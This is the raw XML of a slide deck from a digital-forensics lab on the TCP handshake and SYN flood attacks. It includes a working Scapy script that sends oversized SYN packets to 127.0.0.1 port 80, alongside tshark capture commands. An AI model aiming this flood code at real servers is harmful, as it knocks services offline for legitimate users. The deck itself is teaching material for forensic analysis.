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67" r:id="rId3"/>
    <p:sldId id="402" r:id="rId4"/>
    <p:sldId id="403" r:id="rId5"/>
    <p:sldId id="468" r:id="rId6"/>
    <p:sldId id="469" r:id="rId7"/>
    <p:sldId id="470" r:id="rId8"/>
    <p:sldId id="464" r:id="rId9"/>
    <p:sldId id="457" r:id="rId10"/>
    <p:sldId id="459" r:id="rId11"/>
    <p:sldId id="465" r:id="rId12"/>
    <p:sldId id="466" r:id="rId13"/>
    <p:sldId id="4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A65E5-EB89-4D74-B72B-D0AF583941DA}" v="12" dt="2023-02-06T21:41:39.4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9937" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="149" y="48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2-06T21:45:07.145" v="1141" actId="1076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06T21:31:59.261" v="706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">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{B92A65E5-EB89-4D74-B72B-D0AF583941DA}" dt="2023-02-06T19:56:29.804" v="505" actId="6549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06T21:45:07.145" v="1141" actId="1076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06T21:45:07.145" v="1141" actId="1076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~/traffic/basic.log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https://www.freecodecamp.org/news/an-introduction-to-http-understanding-the-open-systems-interconnection-model-9dd06233d30e/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.geeksforgeeks.org/tcp-3-way-handshake-process/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.geeksforgeeks.org/tcp-connection-termination/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scapy.all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import *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send_syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>number_of_packets_to_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>size_of_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 65000):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_ip_address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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = TCP(sport=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RandShort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, flags="S")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	raw = Raw(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b"X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>size_of_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	p = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / raw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	send(p, count=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>number_of_packets_to_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, verbose=0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	print('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>send_syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(): Sent ' + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>number_of_packets_to_send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) + ' packets of ' + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>size_of_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) + 'size to ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + ' on port ' + str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_port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send_syn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "127.0.0.1", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= 80)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lo -c 4 -w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mySYNFloodCapture.pcap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HTTP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, SYN Flood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500" dirty="0"/>
              <a:t>Traffic files: https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images/lab_files/SYN_Flood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05215-D301-21B9-51D1-C8A387B4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55378"/>
            <a:ext cx="5963855" cy="372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BDD95-B9F7-E1F1-74A5-FD9258B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9014B-D8D0-F74D-40F2-6F0E7C2D26EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1886046"/>
            <a:ext cx="23789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lo device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42275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A4FE5-5D00-41AF-25CB-2D9B304E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32" y="1810638"/>
            <a:ext cx="6845751" cy="1332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31CE6-6BD3-E936-A833-5ECDA2AC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32" y="4054775"/>
            <a:ext cx="9055836" cy="115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AD3B2-8502-A889-3E9F-A74C3207493D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094631" y="1463159"/>
            <a:ext cx="50581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one terminal waiting and capturing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6AB25-0426-D99F-A5A0-ED3D7690AA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094632" y="3661293"/>
            <a:ext cx="422903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another terminal to sending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C74BF-3FF2-130C-9E81-031F80E54A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707537" y="829067"/>
            <a:ext cx="4823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make sure web server is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> service apache2 start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246313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8EB57-B716-FA71-B163-1406E704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1" y="2293521"/>
            <a:ext cx="11042337" cy="2270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D942D-7D91-09D0-10AE-18511B4A4EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574831" y="1924189"/>
            <a:ext cx="267206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SYN flood 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F9EE2-FA0F-196F-B536-C8922C6A6253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738107" y="5167110"/>
            <a:ext cx="9583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Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>You can download the captured packets here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images/lab_files/SYN_Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7113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696-6E5D-2644-6EAC-BC9C4DB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97D7-6233-92B2-8F6A-CBE08E35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two VMs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mimic the SYN attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show evidence of the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1972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0E2-088E-699D-680A-502C596F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8D2A-164E-0FAC-C742-D16C16103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96" y="2098966"/>
            <a:ext cx="10379505" cy="3777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95C02-FA5C-44DE-96C9-2C760489914C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043629" y="5876454"/>
            <a:ext cx="9954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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Illegal_Possession_Images/lab_files/traffic/basic.log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Making your handshake work for you in your career (opinion)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B553118-7AB9-42AA-947F-A8C12804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34" y="472041"/>
            <a:ext cx="11303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ving a great conversation with your users | by Priyam | Chatbots Life">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F925583-4BBC-4078-B9AB-2F28A0D3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75" y="531697"/>
            <a:ext cx="2036100" cy="11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Bye in Lettering Style Stock Vector - Illustration of meet, letters:  208095630">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEA26E6-FC16-467C-A686-DF4691CA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4" y="536780"/>
            <a:ext cx="1853519" cy="11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7AA2968-722E-4A29-B117-A8E4DF12C4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822044" y="1012538"/>
            <a:ext cx="533809" cy="11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E8727A-EDE0-4857-B71A-73B6A3654C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198534" y="981546"/>
            <a:ext cx="673161" cy="11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C1AD853-2433-45DE-B8DE-47700AFEAF04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5527567" y="1602341"/>
            <a:ext cx="434715" cy="209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1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293299"/>
            <a:ext cx="1148045" cy="1148045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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5287835" y="1115801"/>
            <a:ext cx="1093062" cy="12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202472" y="2664069"/>
            <a:ext cx="21986" cy="3464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03270" y="2646457"/>
            <a:ext cx="2" cy="348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4455" y="2989384"/>
            <a:ext cx="3834853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372" y="280471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(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=m)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2474" y="3798276"/>
            <a:ext cx="3900796" cy="600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80493" y="4911968"/>
            <a:ext cx="3834853" cy="4659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462" y="3591276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SYN (seq =n) , ACK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2372" y="472586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ACK (n+1)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0900" y="1986978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897" y="2707959"/>
            <a:ext cx="15342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0898" y="3428943"/>
            <a:ext cx="15342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SYN-RECEIVED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80898" y="5260672"/>
            <a:ext cx="15342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34" name="Straight Arrow Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7148031" y="2356307"/>
            <a:ext cx="1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>
            <a:off x="7148031" y="3077291"/>
            <a:ext cx="0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7148031" y="3798275"/>
            <a:ext cx="0" cy="1462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72" y="1956123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216" y="3239854"/>
            <a:ext cx="1541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SYN-SEND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71" y="5270790"/>
            <a:ext cx="15412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45" name="Straight Arrow Connector 44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="2"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="937826" y="2325452"/>
            <a:ext cx="3478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937826" y="3609186"/>
            <a:ext cx="11355" cy="166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80493" y="816359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57338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02100" y="789019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9792" y="170028"/>
            <a:ext cx="3956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Seq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uence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#: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 number of the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byte of data in the TCP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segement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random # or 0 (relative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ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: the sequence number of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin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</a:rPr>
              <a:t> byte the receiver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expects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receive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</a:rPr>
              <a:t>Seq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> # + size of packet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receiver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ack'ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sequence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acknowledges receipt of all data bytes less than (but not including) byte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+1 for SYN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3346" y="6040315"/>
            <a:ext cx="18607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  are in bytes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4934" y="2614543"/>
            <a:ext cx="1050431" cy="5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choose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956" y="4382695"/>
            <a:ext cx="19109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received SYNACK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indicates server is live;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send ACK;</a:t>
            </a:r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261263" y="1346883"/>
            <a:ext cx="11707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client state</a:t>
            </a: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53281" y="1346883"/>
            <a:ext cx="1270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Server state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2147" y="25704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9603" y="384783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28274" y="50861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0A32F-1328-4C92-3460-6F6FE6507225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2499758" y="339419"/>
            <a:ext cx="509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855A-29DC-EDB9-8AED-8A66BA07F903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643320" y="377137"/>
            <a:ext cx="37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78AF-1CDC-4835-0FED-766F74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client never completes </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>handshaking process?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54F-3972-EB62-0802-2F313786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66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server waiting and consuming valuable resources in the process </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If many clients do the same,  the server becomes overwhelmed and unavailable to legitimate users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYN flood attack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9596D6-B13D-5AB3-AA16-601CDEF7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9" y="1451405"/>
            <a:ext cx="5367464" cy="42503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D2AFB1-8CCD-7E70-DE3E-5CEE819B1937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5800409" y="5983730"/>
            <a:ext cx="5739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Print" panose="02000600000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>An SYN flood attack is a type of Distributed Denial of Service (DDoS) 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A402D-93F9-5D6D-F354-D0D16232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an SYN flood attack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AADC1-00F3-37AC-3005-A1C1BF1A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0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F6946-A75F-B79B-DF18-1914CA9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3C8A0-2F96-45E8-D4D5-1DE31A64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client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Craft our own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> packets using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target IP 127.0.0.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17563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56F40-784D-BAD2-1231-4397ACB2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83" y="1904982"/>
            <a:ext cx="9473051" cy="10203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B6912DF-EF4F-9F3A-8B60-8D34CF9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92711-3253-A56A-DF36-05DF3191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650"/>
            <a:ext cx="10515600" cy="30305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Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> is a powerful Python library for network packet manipulation and analysis. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It allows users to send, sniff, dissect, and forge network packets and can be used for a wide range of network-related tasks such as network discovery, security scanning, penetration testing, and more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> supports a large number of network protocols and provides a flexible and user-friendly interface for working with network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6F5E-8D02-A952-AB4D-31063AEA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00" y="1028262"/>
            <a:ext cx="2994920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B50B0-A358-3BE7-9507-0AB6767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5304"/>
            <a:ext cx="12192000" cy="2054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366553-1699-BCD6-AFB2-AEBF988B691C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274315" y="1028262"/>
            <a:ext cx="23789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1EB83-33ED-2BE3-7B5E-1A56E8B5F488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1274314" y="2726177"/>
            <a:ext cx="23789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Craft attack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CC93-9C24-2D41-15E2-B8BCE78DCE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706392" y="6596390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https://systemweakness.com/ping-and-syn-flood-attacks-with-python-and-scapy-6e4515435492</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66886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32839</TotalTime>
  <Words>720</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen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OCRB</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>HTTP, tshark, SYN Flood</vt:lpstr>
      <vt:lpstr>Three-way handshaking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What if the client never completes  handshaking process?</vt:lpstr>
      <vt:lpstr>Mimic an SYN flood attack</vt:lpstr>
      <vt:lpstr>Design</vt:lpstr>
      <vt:lpstr>Install Scapy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attacking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2023-02-06T21:45:08Z</dcterms:modified>
</cp:coreProperties>
</file>